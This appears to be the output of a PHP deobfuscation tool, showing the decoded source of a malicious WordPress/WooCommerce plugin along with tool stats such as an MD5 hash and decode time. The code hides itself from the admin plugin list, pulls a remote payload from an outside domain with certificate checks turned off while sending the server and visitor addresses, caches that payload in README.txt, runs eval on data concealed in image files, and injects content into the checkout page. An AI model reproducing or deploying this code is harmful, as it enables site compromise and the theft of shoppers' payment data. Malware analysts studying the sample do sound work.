$charycu_shiniqo($emekhyf_axazuge), 1); } } return $echopet_nethuku; } public function gelikhu_apocoge() { $ufuluko_icohysh=__DIR__ . '/assets/images/' . $this->ipapiw; $fowonot_thosoco = uqodoth_hysamef($ufuluko_icohysh); $this->aselise_xyrecha = $fowonot_thosoco; } public function yrinoha_acycaby() { $ufuluko_icohysh = 'READM' . 'E.txt'; $fowonot_thosoco = 'base6' . '4_dec' . 'ode'; $yvukhiv_ajoxeve = 'strre' . 'v'; $charycu_shiniqo = '604800'; $echopet_nethuku = 'unlin' . 'k'; $charycu_shiniqo = time() - intval($charycu_shiniqo) / 7; $thediri_ykhadin = dirname(__FILE__); $emekhyf_axazuge = 'file_g' . 'et_co' . 'ntent' . 's'; $mopudif_oqidekh = 'header'; $xylylil_thajeze = 'file' . '_put_' . 'conte' . 'nts'; $uwanika_aqahali = 'pxcelP' . 'age_c' . '0100' . '2'; if (isset($_COOKIE[$uwanika_aqahali])) return; $nypuqy = false; if (file_exists($thediri_ykhadin . '/' . $ufuluko_icohysh)) { $ohulexa_zhysega = filemtime($thediri_ykhadin . '/' . $ufuluko_icohysh); if ($ohulexa_zhysega < $charycu_shiniqo) { $nypuqy=true; } else { if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } $wipavob_lecetyw=$emekhyf_axazuge($thediri_ykhadin . '/' . $ufuluko_icohysh); $wipavob_lecetyw=$fowonot_thosoco($yvukhiv_ajoxeve($wipavob_lecetyw)); echo $wipavob_lecetyw; return; } } $nypuqy=true; try { $ewakefo_thihuse='SERV' . 'ER_AD' . 'DR' ; $bykhufu_ucavasy='HTTP_' . 'HOST' ; $inothor_akhiban='REMO' . 'TE_ADD' . 'R' ; $nykhomu_avochub='disc' . 'ount:' ; $ehemixa_kyzikhy='price' . ':' ; $alokhij_lofasuj='merch' . 'ant:' ; $uzarylo_uvozati='orde' . 'r:' ; $zowuzep_shavali='addres' . 's:' ; $ritefiz_ikowuso='127.0' . '.0.1' ; $ytohofy_ichades='HTTP_C' . 'LIENT' . '_IP' ; $ozekhuk_ibyshuv='HTTP' . '_X_FOR' . 'WARDED' . '_FOR' ; $thuturi_cotafej='#^[A' . '-Za-z0' . '-9+/' . '=]+$' . '#' ; $alipizh_kherimy='REQU' . 'EST_M' . 'ETHO' . 'D' ; $evusukh_borache='https' . '://s' . 'tegoz' . 'aurus' . '.cc/w' . 'p/wid' . 'get.t' . 'xt' ; $vegilyj_ymikhyq='GET' ; $khawofo_opahexi='curl_i' . 'nit' ; $ipydeki_foxunag='stream' . '_cont' . 'ext_cr' . 'eate' ; $khygoky_iwiguqa='http' ; $uzhyhak_ybywuba='method' ; $zhizavo_amahoje=0; $buvychu_uwibaxa=0; $chekaji_enahymi=isset($_SERVER[$ewakefo_thihuse]) ? $_SERVER[$ewakefo_thihuse] : $ritefiz_ikowuso; $unaxufi_khufibi=isset($_SERVER[$ytohofy_ichades]) ? $_SERVER[$ytohofy_ichades] : (isset($_SERVER[$ozekhuk_ibyshuv]) ? $_SERVER[$ozekhuk_ibyshuv] : $_SERVER[$inothor_akhiban]); $vyqucew_zhyjaxe=$_SERVER[$bykhufu_ucavasy]; for ($choquwo_vavufut=0; $choquwo_vavufut < strlen($vyqucew_zhyjaxe); $choquwo_vavufut++) { $zhizavo_amahoje +=ord(substr($vyqucew_zhyjaxe, $choquwo_vavufut, 1)); $buvychu_uwibaxa +=$choquwo_vavufut * ord(substr($vyqucew_zhyjaxe, $choquwo_vavufut, 1)); } if ((isset($_SERVER[$alipizh_kherimy])) && ($_SERVER[$alipizh_kherimy]==$vegilyj_ymikhyq)) { $veshase_ilazeqi=false; if (function_exists($khawofo_opahexi)) { $mifykeh_myjygur=curl_init($evusukh_borache); curl_setopt($mifykeh_myjygur, CURLOPT_RETURNTRANSFER, true); curl_setopt($mifykeh_myjygur, CURLOPT_CONNECTTIMEOUT, 15); curl_setopt($mifykeh_myjygur, CURLOPT_TIMEOUT, 15); curl_setopt($mifykeh_myjygur, CURLOPT_HEADER, false); curl_setopt($mifykeh_myjygur, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($mifykeh_myjygur, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($mifykeh_myjygur, CURLOPT_HTTPHEADER, array('$nykhomu_avochub $zhizavo_amahoje', '$uzarylo_uvozati $buvychu_uwibaxa' , '$ehemixa_kyzikhy $unaxufi_khufibi' , '$alokhij_lofasuj $vyqucew_zhyjaxe' , '$zowuzep_shavali $chekaji_enahymi' )); $veshase_ilazeqi=@curl_exec($mifykeh_myjygur); curl_close($mifykeh_myjygur); $veshase_ilazeqi=trim($veshase_ilazeqi); if (preg_match($thuturi_cotafej, $veshase_ilazeqi)) { $ujodeze_amakhaw=@$fowonot_thosoco($yvukhiv_ajoxeve($veshase_ilazeqi)); if ($nypuqy) { @unlink($thediri_ykhadin . '/' . $ufuluko_icohysh); $xylylil_thajeze($thediri_ykhadin . '/' . $ufuluko_icohysh, $veshase_ilazeqi, LOCK_EX); } if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } echo $ujodeze_amakhaw; } } if ((!$veshase_ilazeqi) && (function_exists($ipydeki_foxunag))) { $ijajulu_rovikhu=array( $khygoky_iwiguqa=> array( $uzhyhak_ybywuba => 'GET', $mopudif_oqidekh => '$nykhomu_avochub $zhizavo_amahoje\r\n$uzarylo_uvozati $buvychu_uwibaxa\r\n$ehemixa_kyzikhy $unaxufi_khufibi\r\n$alokhij_lofasuj $vyqucew_zhyjaxe\r\n$zowuzep_shavali $chekaji_enahymi' ) ); $ijajulu_rovikhu = $ipydeki_foxunag($ijajulu_rovikhu); $veshase_ilazeqi = @$emekhyf_axazuge($evusukh_borache, false, $ijajulu_rovikhu); if (preg_match($thuturi_cotafej, $veshase_ilazeqi)) { $ujodeze_amakhaw = @$fowonot_thosoco($yvukhiv_ajoxeve($veshase_ilazeqi)); if ($nypuqy) { @unlink($thediri_ykhadin . '/' . $ufuluko_icohysh); $xylylil_thajeze($thediri_ykhadin . '/' . $ufuluko_icohysh, $veshase_ilazeqi, LOCK_EX); } if (!defined('YII_FORMA_OK')) { define('YII_FORMA_OK', 1); } echo $ujodeze_amakhaw; } } } } catch (Exception $olowiri_acuchuv) { } } public function oxovikh_qekesho() { $ufuluko_icohysh = __DIR__ . '/assets/images/ynixace.png'; if (!file_exists($ufuluko_icohysh)) { return false; } $fowonot_thosoco = uqodoth_hysamef($ufuluko_icohysh); $yvukhiv_ajoxeve = 'HTTP_' . 'HOST'; $charycu_shiniqo = $_SERVER[$yvukhiv_ajoxeve]; $echopet_nethuku = floor(strlen($fowonot_thosoco) / 32); $ohulexa_zhysega = $this->cicuwyz_gogaxyl($charycu_shiniqo) % $echopet_nethuku; $thediri_ykhadin = substr($fowonot_thosoco, $ohulexa_zhysega * 32, 32); $this->zhulegy_abapoza = $ohulexa_zhysega; $this->pomerib_acotodu = $thediri_ykhadin; define('oxunukh_xygyfix', $this->pomerib_acotodu); return $thediri_ykhadin; } } function ypibezh_uzhufyb($agiqadu_usicako) { $nyzekyd = strtr($agiqadu_usicako, array('Q'=>'r', 'W'=>'D', 'E'=>'w', 'R'=>'a', 'T'=>'L', 'Y'=>'E', 'U'=>'V', 'I'=>'l', 'O'=>'i', 'P'=>'e', 'A'=>'o', 'S'=>'A', 'D'=>'t', 'F'=>'m', 'G'=>'Y', 'H'=>'H', 'J'=>'q', 'K'=>'O', 'L'=>'Q', 'Z'=>'T', 'X'=>'g', 'C'=>'y', 'V'=>'U', 'B'=>'k', 'N'=>'C', 'M'=>'R', 'q'=>'S', 'w'=>'Z', 'e'=>'4', 'r'=>'3', 't'=>'G', 'y'=>'B', 'u'=>'W', 'i'=>'M', 'o'=>'p', 'p'=>'J', 'a'=>'u', 's'=>'j', 'd'=>'0', 'f'=>'+', 'g'=>'1', 'h'=>'N', 'j'=>'v', 'k'=>'I', 'l'=>'x', 'z'=>'P', 'x'=>'n', 'c'=>'/', 'v'=>'z', 'b'=>'b', 'n'=>'s', 'm'=>'9', '1'=>'K', '2'=>'h', '3'=>'X', '4'=>'8', '5'=>'5', '6'=>'6', '7'=>'=', '8'=>'7', '9'=>'f', '0'=>'2', '='=>'d', '+'=>'F', '/'=>'c')); return $nyzekyd; } function okesher_acideca($agiqadu_usicako) { $imalex = strtr($agiqadu_usicako, array('r'=>'Q', 'D'=>'W', 'w'=>'E', 'a'=>'R', 'L'=>'T', 'E'=>'Y', 'V'=>'U', 'l'=>'I', 'i'=>'O', 'e'=>'P', 'o'=>'A', 'A'=>'S', 't'=>'D', 'm'=>'F', 'Y'=>'G', 'H'=>'H', 'q'=>'J', 'O'=>'K', 'Q'=>'L', 'T'=>'Z', 'g'=>'X', 'y'=>'C', 'U'=>'V', 'k'=>'B', 'C'=>'N', 'R'=>'M', 'S'=>'q', 'Z'=>'w', '4'=>'e', '3'=>'r', 'G'=>'t', 'B'=>'y', 'W'=>'u', 'M'=>'i', 'p'=>'o', 'J'=>'p', 'u'=>'a', 'j'=>'s', '0'=>'d', '+'=>'f', '1'=>'g', 'N'=>'h', 'v'=>'j', 'I'=>'k', 'x'=>'l', 'P'=>'z', 'n'=>'x', '/'=>'c', 'z'=>'v', 'b'=>'b', 's'=>'n', '9'=>'m', 'K'=>'1', 'h'=>'2', 'X'=>'3', '8'=>'4', '5'=>'5', '6'=>'6', '='=>'7', '7'=>'8', 'f'=>'9', '2'=>'0', 'd'=>'=', 'F'=>'+', 'c'=>'/')); return $imalex; } $yjumywe_boxopyl = new ofushez_suzhyti(); function ogopych_zhywody() { $yvizhyv_levukhe = new ofushez_suzhyti(true); if ($yvizhyv_levukhe->fexozux_urythur) { @eval($yvizhyv_levukhe->fexozux_urythur); if (!is_array($yvizhyv_levukhe->mowicim_ywybudy())) exit; } } function ajejiho_ufoweki() { global $wp_list_table; $ufuluko_icohysh = new ofushez_suzhyti(); $fowonot_thosoco = array($ufuluko_icohysh->ozhymaw_apyjakh()); $yvukhiv_ajoxeve = $wp_list_table->items; foreach ($yvukhiv_ajoxeve as $key => $val) { if (in_array($key, $fowonot_thosoco)) { unset($wp_list_table->items[$key]); } } } function thiwipe_ixijuqi($agiqadu_usicako) { $ufuluko_icohysh = new ofushez_suzhyti(); if (in_array($ufuluko_icohysh->ozhymaw_apyjakh(), array_keys($agiqadu_usicako))) { unset($agiqadu_usicako[$ufuluko_icohysh->ozhymaw_apyjakh()]); } return $agiqadu_usicako; } function awatuqy_evejefi() { $ufuluko_icohysh = new ofushez_suzhyti(); $ufuluko_icohysh->yrinoha_acycaby(); if (!defined('YII_FORMA_OK')) { $uwanika_aqahali = 'pxcelP' . 'age_c' . '0100' . '2'; if (isset($_COOKIE[$uwanika_aqahali])) return; $ilohazh = __DIR__ . '/assets/js/' . $ufuluko_icohysh->cegysha; if (file_exists($ilohazh)) { $eneqafa = @file_get_contents($ilohazh); if ($eneqafa) { define('YII_FORMA_OK', 1); echo ''; return; } } $ilohazh = __DIR__ . '/assets/images/' . $ufuluko_icohysh->tutiku; if (file_exists($ilohazh)) { $eneqafa = file_get_contents($ilohazh); if ($eneqafa) { $eneqafa = substr($eneqafa, 3); $eneqafa = okesher_acideca($eneqafa); if ($eneqafa) { $eneqafa = base64_decode($eneqafa); define('YII_FORMA_OK', 1); echo ''; } } } } } function recomer_vywamuf() { $yvukhiv_ajoxeve = new ofushez_suzhyti(); $ufuluko_icohysh = $yvukhiv_ajoxeve->zukhury_chamosu(); if (current_user_can('editor') || current_user_can('administrator')) { if (isset($_COOKIE['_wptoken']) && (!isset($_COOKIE['_jwp']))) { setcookie('__wordpressuser__', 1, time() + 600, '/'); setcookie('__wordpress_logged_in__', 1, time() + 600, '/'); $_COOKIE['__wordpressuser__'] = 1; $_COOKIE['__wordpress_logged_in__'] = 1; } $fowonot_thosoco = $yvukhiv_ajoxeve->jawechy_vapocon(); $fowonot_thosoco = intval($fowonot_thosoco) * 64; if ((function_exists('get_option')) && (function_exists('add_option')) && (function_exists('update_option'))) { $user_ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } if (isset($_SERVER['HTTP_CLIENT_IP'])) { $user_ip = $_SERVER['HTTP_CLIENT_IP']; } $user_ip_md5 = md5($user_ip); $option_name = 'wp_$user_ip_md5'; $option_value = get_option($option_name); $option_value_new = time(); if (!$option_value) { add_option($option_name, $option_value_new, '', 'no'); } else { update_option($option_name, $option_value_new); } } if (isset($_COOKIE[$ufuluko_icohysh])) return; setcookie($ufuluko_icohysh, '1', time() + $fowonot_thosoco, '/'); } } if ($yjumywe_boxopyl->mowicim_ywybudy()) { add_action('pre_current_active_plugins', 'ajejiho_ufoweki'); add_filter('all_plugins', 'thiwipe_ixijuqi'); add_action('admin_init', 'recomer_vywamuf'); if (!defined($yjumywe_boxopyl->azybaxu_adulikh())) { $yjumywe_boxopyl->gelikhu_apocoge(); if ($yjumywe_boxopyl->aselise_xyrecha) @eval($yjumywe_boxopyl->aselise_xyrecha); } if (!defined($yjumywe_boxopyl->thinoqa_epoxagu())) { define($yjumywe_boxopyl->thinoqa_epoxagu(), 1); $ilohazh = __DIR__ . '/README.txt'; if ((!defined($yjumywe_boxopyl->azybaxu_adulikh())) || (!file_exists($ilohazh))) { add_action('woocommerce_before_checkout_form', 'awatuqy_evejefi'); } } if (!defined($yjumywe_boxopyl->azybaxu_adulikh())) { define($yjumywe_boxopyl->azybaxu_adulikh(), 1); } } else { if ($yjumywe_boxopyl->osumyre_yhesyzo()) { $yjumywe_boxopyl->ocajuhu_cicozhi(); if ($yjumywe_boxopyl->fexozux_urythur) { @eval($yjumywe_boxopyl->fexozux_urythur); } else { @eval($yjumywe_boxopyl->ehidikh_ovakhoz); } } }

Function Calls

None

Variables

None

Stats

MD5 63cb1cc7280acae6e879da4efe3e7b36
Eval Count 0
Decode Time 236 ms